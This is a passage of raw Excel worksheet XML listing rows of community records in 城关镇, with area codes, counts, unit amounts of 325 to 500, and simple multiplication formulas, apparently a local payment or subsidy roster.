        <v>2543</v>
      </c>
      <c r="E953" s="17" t="s">
        <v>584</v>
      </c>
      <c r="F953" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G953" s="17">
        <v>2</v>
      </c>
      <c r="H953" s="18">
        <v>365</v>
      </c>
      <c r="I953" s="17">
        <f>H953*G953</f>
        <v>730</v>
      </c>
      <c r="J953" s="29">
        <v>45108</v>
      </c>
      <c r="K953" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="954" customHeight="1" spans="1:11">
      <c r="A954" s="16" t="s">
        <v>2544</v>
      </c>
      <c r="B954" s="17" t="str">
        <f>B953</f>
        <v>城关镇</v>
      </c>
      <c r="C954" s="17" t="str">
        <f>C953</f>
        <v>中华社区物资局</v>
      </c>
      <c r="D954" s="20" t="s">
        <v>2545</v>
      </c>
      <c r="E954" s="20" t="s">
        <v>343</v>
      </c>
      <c r="F954" s="17" t="str">
        <f>F953</f>
        <v>4113210108</v>
      </c>
      <c r="G954" s="17"/>
      <c r="H954" s="17"/>
      <c r="I954" s="17"/>
      <c r="J954" s="29"/>
      <c r="K954" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="955" customHeight="1" spans="1:11">
      <c r="A955" s="16" t="s">
        <v>2546</v>
      </c>
      <c r="B955" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C955" s="17" t="s">
        <v>2315</v>
      </c>
      <c r="D955" s="17" t="s">
        <v>2547</v>
      </c>
      <c r="E955" s="17" t="s">
        <v>236</v>
      </c>
      <c r="F955" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G955" s="17">
        <v>2</v>
      </c>
      <c r="H955" s="18">
        <v>345</v>
      </c>
      <c r="I955" s="17">
        <f>H955*G955</f>
        <v>690</v>
      </c>
      <c r="J955" s="29">
        <v>45108</v>
      </c>
      <c r="K955" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="956" customHeight="1" spans="1:11">
      <c r="A956" s="16" t="s">
        <v>2548</v>
      </c>
      <c r="B956" s="17" t="str">
        <f>B955</f>
        <v>城关镇</v>
      </c>
      <c r="C956" s="17" t="str">
        <f>C955</f>
        <v>中华社区工信局</v>
      </c>
      <c r="D956" s="24" t="s">
        <v>2549</v>
      </c>
      <c r="E956" s="24" t="s">
        <v>1871</v>
      </c>
      <c r="F956" s="17" t="str">
        <f>F955</f>
        <v>4113210108</v>
      </c>
      <c r="G956" s="17"/>
      <c r="H956" s="17"/>
      <c r="I956" s="17"/>
      <c r="J956" s="29"/>
      <c r="K956" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="957" customHeight="1" spans="1:11">
      <c r="A957" s="16" t="s">
        <v>2550</v>
      </c>
      <c r="B957" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C957" s="17" t="s">
        <v>2306</v>
      </c>
      <c r="D957" s="17" t="s">
        <v>2551</v>
      </c>
      <c r="E957" s="17" t="s">
        <v>2552</v>
      </c>
      <c r="F957" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G957" s="17">
        <v>2</v>
      </c>
      <c r="H957" s="18">
        <v>325</v>
      </c>
      <c r="I957" s="17">
        <f>H957*G957</f>
        <v>650</v>
      </c>
      <c r="J957" s="29">
        <v>45108</v>
      </c>
      <c r="K957" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="958" customHeight="1" spans="1:11">
      <c r="A958" s="16" t="s">
        <v>2553</v>
      </c>
      <c r="B958" s="17" t="str">
        <f>B957</f>
        <v>城关镇</v>
      </c>
      <c r="C958" s="17" t="str">
        <f>C957</f>
        <v>中华社区物资局</v>
      </c>
      <c r="D958" s="16" t="s">
        <v>2554</v>
      </c>
      <c r="E958" s="17" t="s">
        <v>2555</v>
      </c>
      <c r="F958" s="17" t="str">
        <f>F957</f>
        <v>4113210108</v>
      </c>
      <c r="G958" s="17"/>
      <c r="H958" s="17"/>
      <c r="I958" s="17"/>
      <c r="J958" s="29"/>
      <c r="K958" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="959" customHeight="1" spans="1:11">
      <c r="A959" s="16" t="s">
        <v>2556</v>
      </c>
      <c r="B959" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C959" s="17" t="s">
        <v>2347</v>
      </c>
      <c r="D959" s="17" t="s">
        <v>2557</v>
      </c>
      <c r="E959" s="17" t="s">
        <v>2558</v>
      </c>
      <c r="F959" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G959" s="17">
        <v>2</v>
      </c>
      <c r="H959" s="18">
        <v>325</v>
      </c>
      <c r="I959" s="17">
        <f>H959*G959</f>
        <v>650</v>
      </c>
      <c r="J959" s="29">
        <v>45108</v>
      </c>
      <c r="K959" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="960" customHeight="1" spans="1:11">
      <c r="A960" s="16" t="s">
        <v>2559</v>
      </c>
      <c r="B960" s="17" t="str">
        <f>B959</f>
        <v>城关镇</v>
      </c>
      <c r="C960" s="17" t="str">
        <f>C959</f>
        <v>中华社区商业中心</v>
      </c>
      <c r="D960" s="16" t="s">
        <v>2560</v>
      </c>
      <c r="E960" s="16" t="s">
        <v>2561</v>
      </c>
      <c r="F960" s="17" t="str">
        <f>F959</f>
        <v>4113210108</v>
      </c>
      <c r="G960" s="17"/>
      <c r="H960" s="17"/>
      <c r="I960" s="17"/>
      <c r="J960" s="29"/>
      <c r="K960" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="961" customHeight="1" spans="1:11">
      <c r="A961" s="16" t="s">
        <v>2562</v>
      </c>
      <c r="B961" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C961" s="17" t="s">
        <v>2405</v>
      </c>
      <c r="D961" s="17" t="s">
        <v>2563</v>
      </c>
      <c r="E961" s="17" t="s">
        <v>2358</v>
      </c>
      <c r="F961" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G961" s="17">
        <v>1</v>
      </c>
      <c r="H961" s="18">
        <v>365</v>
      </c>
      <c r="I961" s="17">
        <f t="shared" ref="I961:I971" si="48">H961*G961</f>
        <v>365</v>
      </c>
      <c r="J961" s="29">
        <v>45108</v>
      </c>
      <c r="K961" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="962" customHeight="1" spans="1:11">
      <c r="A962" s="16" t="s">
        <v>2564</v>
      </c>
      <c r="B962" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C962" s="17" t="s">
        <v>2347</v>
      </c>
      <c r="D962" s="17" t="s">
        <v>2565</v>
      </c>
      <c r="E962" s="17" t="s">
        <v>1676</v>
      </c>
      <c r="F962" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G962" s="17">
        <v>1</v>
      </c>
      <c r="H962" s="18">
        <v>365</v>
      </c>
      <c r="I962" s="17">
        <f t="shared" si="48"/>
        <v>365</v>
      </c>
      <c r="J962" s="29">
        <v>45108</v>
      </c>
      <c r="K962" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="963" customHeight="1" spans="1:11">
      <c r="A963" s="16" t="s">
        <v>2566</v>
      </c>
      <c r="B963" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C963" s="17" t="s">
        <v>2402</v>
      </c>
      <c r="D963" s="17" t="s">
        <v>2567</v>
      </c>
      <c r="E963" s="17" t="s">
        <v>288</v>
      </c>
      <c r="F963" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G963" s="17">
        <v>1</v>
      </c>
      <c r="H963" s="18">
        <v>365</v>
      </c>
      <c r="I963" s="17">
        <f t="shared" si="48"/>
        <v>365</v>
      </c>
      <c r="J963" s="29">
        <v>45108</v>
      </c>
      <c r="K963" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="964" customHeight="1" spans="1:11">
      <c r="A964" s="16" t="s">
        <v>2568</v>
      </c>
      <c r="B964" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C964" s="17" t="s">
        <v>2402</v>
      </c>
      <c r="D964" s="17" t="s">
        <v>2569</v>
      </c>
      <c r="E964" s="17" t="s">
        <v>346</v>
      </c>
      <c r="F964" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G964" s="17">
        <v>1</v>
      </c>
      <c r="H964" s="18">
        <v>365</v>
      </c>
      <c r="I964" s="17">
        <f t="shared" si="48"/>
        <v>365</v>
      </c>
      <c r="J964" s="29">
        <v>45108</v>
      </c>
      <c r="K964" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="965" customHeight="1" spans="1:11">
      <c r="A965" s="16" t="s">
        <v>2570</v>
      </c>
      <c r="B965" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C965" s="17" t="s">
        <v>2405</v>
      </c>
      <c r="D965" s="17" t="s">
        <v>2571</v>
      </c>
      <c r="E965" s="17" t="s">
        <v>2572</v>
      </c>
      <c r="F965" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G965" s="17">
        <v>1</v>
      </c>
      <c r="H965" s="18">
        <v>365</v>
      </c>
      <c r="I965" s="17">
        <f t="shared" si="48"/>
        <v>365</v>
      </c>
      <c r="J965" s="29">
        <v>45108</v>
      </c>
      <c r="K965" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="966" customHeight="1" spans="1:11">
      <c r="A966" s="16" t="s">
        <v>2573</v>
      </c>
      <c r="B966" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C966" s="17" t="s">
        <v>2509</v>
      </c>
      <c r="D966" s="17" t="s">
        <v>2574</v>
      </c>
      <c r="E966" s="17" t="s">
        <v>2575</v>
      </c>
      <c r="F966" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G966" s="17">
        <v>1</v>
      </c>
      <c r="H966" s="18">
        <v>365</v>
      </c>
      <c r="I966" s="17">
        <f t="shared" si="48"/>
        <v>365</v>
      </c>
      <c r="J966" s="29">
        <v>45108</v>
      </c>
      <c r="K966" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="967" customHeight="1" spans="1:11">
      <c r="A967" s="16" t="s">
        <v>2576</v>
      </c>
      <c r="B967" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C967" s="17" t="s">
        <v>2364</v>
      </c>
      <c r="D967" s="17" t="s">
        <v>2577</v>
      </c>
      <c r="E967" s="17" t="s">
        <v>2578</v>
      </c>
      <c r="F967" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G967" s="17">
        <v>1</v>
      </c>
      <c r="H967" s="18">
        <v>365</v>
      </c>
      <c r="I967" s="17">
        <f t="shared" si="48"/>
        <v>365</v>
      </c>
      <c r="J967" s="29">
        <v>45108</v>
      </c>
      <c r="K967" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="968" customHeight="1" spans="1:11">
      <c r="A968" s="16" t="s">
        <v>2579</v>
      </c>
      <c r="B968" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C968" s="17" t="s">
        <v>2405</v>
      </c>
      <c r="D968" s="17" t="s">
        <v>2580</v>
      </c>
      <c r="E968" s="17" t="s">
        <v>2581</v>
      </c>
      <c r="F968" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G968" s="17">
        <v>1</v>
      </c>
      <c r="H968" s="18">
        <v>365</v>
      </c>
      <c r="I968" s="17">
        <f t="shared" si="48"/>
        <v>365</v>
      </c>
      <c r="J968" s="29">
        <v>45108</v>
      </c>
      <c r="K968" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="969" customHeight="1" spans="1:11">
      <c r="A969" s="16" t="s">
        <v>2582</v>
      </c>
      <c r="B969" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C969" s="17" t="s">
        <v>2364</v>
      </c>
      <c r="D969" s="17" t="s">
        <v>2583</v>
      </c>
      <c r="E969" s="17" t="s">
        <v>323</v>
      </c>
      <c r="F969" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G969" s="17">
        <v>1</v>
      </c>
      <c r="H969" s="18">
        <v>365</v>
      </c>
      <c r="I969" s="17">
        <f t="shared" si="48"/>
        <v>365</v>
      </c>
      <c r="J969" s="29">
        <v>45108</v>
      </c>
      <c r="K969" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="970" customHeight="1" spans="1:11">
      <c r="A970" s="16" t="s">
        <v>2584</v>
      </c>
      <c r="B970" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C970" s="17" t="s">
        <v>2585</v>
      </c>
      <c r="D970" s="17" t="s">
        <v>2586</v>
      </c>
      <c r="E970" s="17" t="s">
        <v>2587</v>
      </c>
      <c r="F970" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G970" s="17">
        <v>1</v>
      </c>
      <c r="H970" s="18">
        <v>365</v>
      </c>
      <c r="I970" s="17">
        <f t="shared" si="48"/>
        <v>365</v>
      </c>
      <c r="J970" s="29">
        <v>45108</v>
      </c>
      <c r="K970" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="971" customHeight="1" spans="1:11">
      <c r="A971" s="16" t="s">
        <v>2589</v>
      </c>
      <c r="B971" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C971" s="17" t="s">
        <v>2590</v>
      </c>
      <c r="D971" s="17" t="s">
        <v>2591</v>
      </c>
      <c r="E971" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F971" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G971" s="17">
        <v>2</v>
      </c>
      <c r="H971" s="18">
        <v>325</v>
      </c>
      <c r="I971" s="17">
        <f t="shared" si="48"/>
        <v>650</v>
      </c>
      <c r="J971" s="29">
        <v>45108</v>
      </c>
      <c r="K971" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="972" customHeight="1" spans="1:11">
      <c r="A972" s="16" t="s">
        <v>2592</v>
      </c>
      <c r="B972" s="17" t="str">
        <f>B971</f>
        <v>城关镇</v>
      </c>
      <c r="C972" s="17" t="str">
        <f>C971</f>
        <v>民主社区工信局</v>
      </c>
      <c r="D972" s="23" t="s">
        <v>2593</v>
      </c>
      <c r="E972" s="23" t="s">
        <v>1258</v>
      </c>
      <c r="F972" s="17" t="str">
        <f>F971</f>
        <v>4113210105</v>
      </c>
      <c r="G972" s="17"/>
      <c r="H972" s="17"/>
      <c r="I972" s="17"/>
      <c r="J972" s="29"/>
      <c r="K972" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="973" customHeight="1" spans="1:11">
      <c r="A973" s="16" t="s">
        <v>2594</v>
      </c>
      <c r="B973" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C973" s="17" t="s">
        <v>2590</v>
      </c>
      <c r="D973" s="17" t="s">
        <v>2595</v>
      </c>
      <c r="E973" s="17" t="s">
        <v>303</v>
      </c>
      <c r="F973" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G973" s="17">
        <v>2</v>
      </c>
      <c r="H973" s="18">
        <v>325</v>
      </c>
      <c r="I973" s="17">
        <f>H973*G973</f>
        <v>650</v>
      </c>
      <c r="J973" s="29">
        <v>45108</v>
      </c>
      <c r="K973" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="974" customHeight="1" spans="1:11">
      <c r="A974" s="16" t="s">
        <v>2596</v>
      </c>
      <c r="B974" s="17" t="str">
        <f>B973</f>
        <v>城关镇</v>
      </c>
      <c r="C974" s="17" t="str">
        <f>C973</f>
        <v>民主社区工信局</v>
      </c>
      <c r="D974" s="16" t="s">
        <v>2597</v>
      </c>
      <c r="E974" s="17" t="s">
        <v>992</v>
      </c>
      <c r="F974" s="17" t="str">
        <f>F973</f>
        <v>4113210105</v>
      </c>
      <c r="G974" s="17"/>
      <c r="H974" s="17"/>
      <c r="I974" s="17"/>
      <c r="J974" s="29"/>
      <c r="K974" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="975" customHeight="1" spans="1:11">
      <c r="A975" s="16" t="s">
        <v>2598</v>
      </c>
      <c r="B975" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C975" s="17" t="s">
        <v>2590</v>
      </c>
      <c r="D975" s="17" t="s">
        <v>2599</v>
      </c>
      <c r="E975" s="17" t="s">
        <v>360</v>
      </c>
      <c r="F975" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G975" s="17">
        <v>1</v>
      </c>
      <c r="H975" s="18">
        <v>365</v>
      </c>
      <c r="I975" s="17">
        <f>H975*G975</f>
        <v>365</v>
      </c>
      <c r="J975" s="29">
        <v>45108</v>
      </c>
      <c r="K975" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="976" customHeight="1" spans="1:11">
      <c r="A976" s="16" t="s">
        <v>2600</v>
      </c>
      <c r="B976" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C976" s="17" t="s">
        <v>2590</v>
      </c>
      <c r="D976" s="17" t="s">
        <v>2601</v>
      </c>
      <c r="E976" s="17" t="s">
        <v>511</v>
      </c>
      <c r="F976" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G976" s="17">
        <v>1</v>
      </c>
      <c r="H976" s="18">
        <v>365</v>
      </c>
      <c r="I976" s="17">
        <f>H976*G976</f>
        <v>365</v>
      </c>
      <c r="J976" s="29">
        <v>45108</v>
      </c>
      <c r="K976" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="977" customHeight="1" spans="1:11">
      <c r="A977" s="16" t="s">
        <v>2602</v>
      </c>
      <c r="B977" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C977" s="17" t="s">
        <v>2590</v>
      </c>
      <c r="D977" s="17" t="s">
        <v>2603</v>
      </c>
      <c r="E977" s="17" t="s">
        <v>633</v>
      </c>
      <c r="F977" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G977" s="17">
        <v>1</v>
      </c>
      <c r="H977" s="18">
        <v>365</v>
      </c>
      <c r="I977" s="17">
        <f>H977*G977</f>
        <v>365</v>
      </c>
      <c r="J977" s="29">
        <v>45108</v>
      </c>
      <c r="K977" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="978" customHeight="1" spans="1:11">
      <c r="A978" s="16" t="s">
        <v>2604</v>
      </c>
      <c r="B978" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C978" s="17" t="s">
        <v>2590</v>
      </c>
      <c r="D978" s="17" t="s">
        <v>2605</v>
      </c>
      <c r="E978" s="17" t="s">
        <v>2606</v>
      </c>
      <c r="F978" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G978" s="17">
        <v>2</v>
      </c>
      <c r="H978" s="18">
        <v>325</v>
      </c>
      <c r="I978" s="17">
        <f>H978*G978</f>
        <v>650</v>
      </c>
      <c r="J978" s="29">
        <v>45108</v>
      </c>
      <c r="K978" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="979" customHeight="1" spans="1:11">
      <c r="A979" s="16" t="s">
        <v>2607</v>
      </c>
      <c r="B979" s="17" t="str">
        <f>B978</f>
        <v>城关镇</v>
      </c>
      <c r="C979" s="17" t="str">
        <f>C978</f>
        <v>民主社区工信局</v>
      </c>
      <c r="D979" s="23" t="s">
        <v>2608</v>
      </c>
      <c r="E979" s="23" t="s">
        <v>2609</v>
      </c>
      <c r="F979" s="17" t="str">
        <f>F978</f>
        <v>4113210105</v>
      </c>
      <c r="G979" s="17"/>
      <c r="H979" s="17"/>
      <c r="I979" s="17"/>
      <c r="J979" s="29"/>
      <c r="K979" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="980" customHeight="1" spans="1:11">
      <c r="A980" s="16" t="s">
        <v>2610</v>
      </c>
      <c r="B980" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C980" s="17" t="s">
        <v>2611</v>
      </c>
      <c r="D980" s="17" t="s">
        <v>2612</v>
      </c>
      <c r="E980" s="17" t="s">
        <v>2613</v>
      </c>
      <c r="F980" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G980" s="17">
        <v>1</v>
      </c>
      <c r="H980" s="18">
        <v>365</v>
      </c>
      <c r="I980" s="17">
        <f>H980*G980</f>
        <v>365</v>
      </c>
      <c r="J980" s="29">
        <v>45108</v>
      </c>
      <c r="K980" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="981" customHeight="1" spans="1:11">
      <c r="A981" s="16" t="s">
        <v>2614</v>
      </c>
      <c r="B981" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C981" s="17" t="s">
        <v>2590</v>
      </c>
      <c r="D981" s="17" t="s">
        <v>2615</v>
      </c>
      <c r="E981" s="17" t="s">
        <v>2616</v>
      </c>
      <c r="F981" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G981" s="17">
        <v>1</v>
      </c>
      <c r="H981" s="18">
        <v>365</v>
      </c>
      <c r="I981" s="17">
        <f>H981*G981</f>
        <v>365</v>
      </c>
      <c r="J981" s="29">
        <v>45108</v>
      </c>
      <c r="K981" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="982" customHeight="1" spans="1:11">
      <c r="A982" s="16" t="s">
        <v>2617</v>
      </c>
      <c r="B982" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C982" s="17" t="s">
        <v>2590</v>
      </c>
      <c r="D982" s="17" t="s">
        <v>2158</v>
      </c>
      <c r="E982" s="17" t="s">
        <v>545</v>
      </c>
      <c r="F982" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G982" s="17">
        <v>1</v>
      </c>
      <c r="H982" s="17">
        <v>500</v>
      </c>
      <c r="I982" s="17">
        <f>H982*G982</f>
        <v>500</v>
      </c>
      <c r="J982" s="29">
        <v>45108</v>
      </c>
      <c r="K982" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="983" customHeight="1" spans="1:11">
      <c r="A983" s="16" t="s">
        <v>2618</v>
      </c>
      <c r="B983" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C983" s="17" t="s">
        <v>2619</v>
      </c>
      <c r="D983" s="17" t="s">
        <v>2620</v>
      </c>
      <c r="E983" s="17" t="s">
        <v>292</v>
      </c>
      <c r="F983" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G983" s="17">
        <v>2</v>
      </c>
      <c r="H983" s="18">
        <v>325</v>
      </c>
      <c r="I983" s="17">
        <f>H983*G983</f>
        <v>650</v>
      </c>
      <c r="J983" s="29">
        <v>45108</v>
      </c>
      <c r="K983" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="984" customHeight="1" spans="1:11">
      <c r="A984" s="16" t="s">
        <v>2621</v>
      </c>
      <c r="B984" s="17" t="str">
        <f>B983</f>
        <v>城关镇</v>
      </c>
      <c r="C984" s="17" t="str">
        <f>C983</f>
        <v>民主社区县社</v>
      </c>
      <c r="D984" s="24" t="s">
        <v>2622</v>
      </c>
      <c r="E984" s="25" t="s">
        <v>1968</v>
      </c>
      <c r="F984" s="17" t="str">
        <f>F983</f>
        <v>4113210105</v>
      </c>
      <c r="G984" s="17"/>
      <c r="H984" s="17"/>
      <c r="I984" s="17"/>
      <c r="J984" s="29"/>
      <c r="K984" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="985" customHeight="1" spans="1:11">
      <c r="A985" s="16" t="s">
        <v>2623</v>
      </c>
      <c r="B985" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C985" s="17" t="s">
        <v>2590</v>
      </c>
      <c r="D985" s="17" t="s">
        <v>2624</v>
      </c>
      <c r="E985" s="17" t="s">
        <v>874</v>
      </c>
      <c r="F985" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G985" s="17">
        <v>1</v>
      </c>
      <c r="H985" s="18">
        <v>365</v>
      </c>
      <c r="I985" s="17">
        <f>H985*G985</f>
        <v>365</v>
      </c>
      <c r="J985" s="29">
        <v>45108</v>
      </c>
      <c r="K985" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="986" customHeight="1" spans="1:11">
      <c r="A986" s="16" t="s">
        <v>2625</v>
      </c>
      <c r="B986" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C986" s="17" t="s">
        <v>2590</v>
      </c>
      <c r="D986" s="17" t="s">
        <v>2626</v>
      </c>
      <c r="E986" s="17" t="s">
        <v>232</v>
      </c>
      <c r="F986" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G986" s="17">
        <v>1</v>
      </c>
      <c r="H986" s="18">
        <v>365</v>
      </c>
      <c r="I986" s="17">
        <f>H986*G986</f>
        <v>365</v>
      </c>
      <c r="J986" s="29">
        <v>45108</v>
      </c>
      <c r="K986" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="987" customHeight="1" spans="1:11">
      <c r="A987" s="16" t="s">
        <v>2627</v>
      </c>
      <c r="B987" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C987" s="17" t="s">
        <v>2611</v>
      </c>
      <c r="D987" s="17" t="s">
        <v>2628</v>
      </c>
      <c r="E987" s="17" t="s">
        <v>2629</v>
      </c>
      <c r="F987" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G987" s="17">
        <v>1</v>
      </c>
      <c r="H987" s="18">
        <v>365</v>
      </c>
      <c r="I987" s="17">
        <f t="shared" ref="I987:I992" si="49">H987*G987</f>
        <v>365</v>
      </c>
      <c r="J987" s="29">
        <v>45108</v>
      </c>
      <c r="K987" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="988" customHeight="1" spans="1:11">
      <c r="A988" s="16" t="s">
        <v>2630</v>
      </c>
      <c r="B988" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C988" s="17" t="s">
        <v>2619</v>
      </c>
      <c r="D988" s="17" t="s">
        <v>2631</v>
      </c>
      <c r="E988" s="17" t="s">
        <v>281</v>
      </c>
      <c r="F988" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G988" s="17">
        <v>1</v>
      </c>
      <c r="H988" s="18">
        <v>365</v>
      </c>
      <c r="I988" s="17">
        <f t="shared" si="49"/>
        <v>365</v>
      </c>
      <c r="J988" s="29">
        <v>45108</v>
      </c>
      <c r="K988" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="989" customHeight="1" spans="1:11">
      <c r="A989" s="16" t="s">
        <v>2632</v>
      </c>
      <c r="B989" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C989" s="17" t="s">
        <v>2611</v>
      </c>
      <c r="D989" s="17" t="s">
        <v>2633</v>
      </c>
      <c r="E989" s="17" t="s">
        <v>265</v>
      </c>
      <c r="F989" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G989" s="17">
        <v>1</v>
      </c>
      <c r="H989" s="18">
        <v>365</v>
      </c>
      <c r="I989" s="17">
        <f t="shared" si="49"/>
        <v>365</v>
      </c>
      <c r="J989" s="29">
        <v>45108</v>
      </c>
      <c r="K989" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="990" customHeight="1" spans="1:11">
      <c r="A990" s="16" t="s">
        <v>2634</v>
      </c>
      <c r="B990" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C990" s="17" t="s">
        <v>2611</v>
      </c>
      <c r="D990" s="17" t="s">
        <v>2635</v>
      </c>
      <c r="E990" s="17" t="s">
        <v>2636</v>
      </c>
      <c r="F990" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G990" s="17">
        <v>1</v>
      </c>
      <c r="H990" s="18">
        <v>365</v>
      </c>
      <c r="I990" s="17">
        <f t="shared" si="49"/>
        <v>365</v>
      </c>
      <c r="J990" s="29">
        <v>45108</v>
      </c>
      <c r="K990" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="991" customHeight="1" spans="1:11">
      <c r="A991" s="16" t="s">
        <v>2637</v>
      </c>
      <c r="B991" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C991" s="17" t="s">
        <v>2638</v>
      </c>
      <c r="D991" s="17" t="s">
        <v>2639</v>
      </c>
      <c r="E991" s="17" t="s">
        <v>2640</v>
      </c>
      <c r="F991" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G991" s="17">
        <v>1</v>
      </c>
      <c r="H991" s="18">
        <v>365</v>
      </c>
      <c r="I991" s="17">
        <f t="shared" si="49"/>
        <v>365</v>
      </c>
      <c r="J991" s="29">
        <v>45108</v>
      </c>
      <c r="K991" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="992" customHeight="1" spans="1:11">
      <c r="A992" s="16" t="s">
        <v>2641</v>
      </c>
      <c r="B992" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C992" s="17" t="s">
        <v>2642</v>
      </c>
      <c r="D992" s="17" t="s">
        <v>2643</v>
      </c>
      <c r="E992" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F992" s="17" t="s">
        <v>289</v>
      </c>
      <c r="G992" s="17">
        <v>2</v>
      </c>
      <c r="H992" s="18">
        <v>325</v>
      </c>
      <c r="I992" s="17">
        <f t="shared" si="49"/>
        <v>650</v>
      </c>
      <c r="J992" s="29">
        <v>45108</v>
      </c>
      <c r="K992" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="993" customHeight="1" spans="1:11">
      <c r="A993" s="16" t="s">
        <v>2644</v>
      </c>
      <c r="B993" s="17" t="str">
        <f>B992</f>
        <v>城关镇</v>
      </c>
      <c r="C993" s="17" t="str">
        <f>C992</f>
        <v>北外社区工信局</v>
      </c>
      <c r="D993" s="16" t="s">
        <v>2645</v>
      </c>
      <c r="E993" s="16" t="s">
        <v>2646</v>
      </c>
      <c r="F993" s="17" t="str">
        <f>F992</f>
        <v>4113210102</v>
      </c>
      <c r="G993" s="17"/>
      <c r="H993" s="17"/>
      <c r="I993" s="17"/>
      <c r="J993" s="29"/>
      <c r="K993" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="994" customHeight="1" spans="1:11">
      <c r="A994" s="16" t="s">
        <v>2647</v>
      </c>
      <c r="B994" s="17" t="s">
        <v>219</v>
      </c>
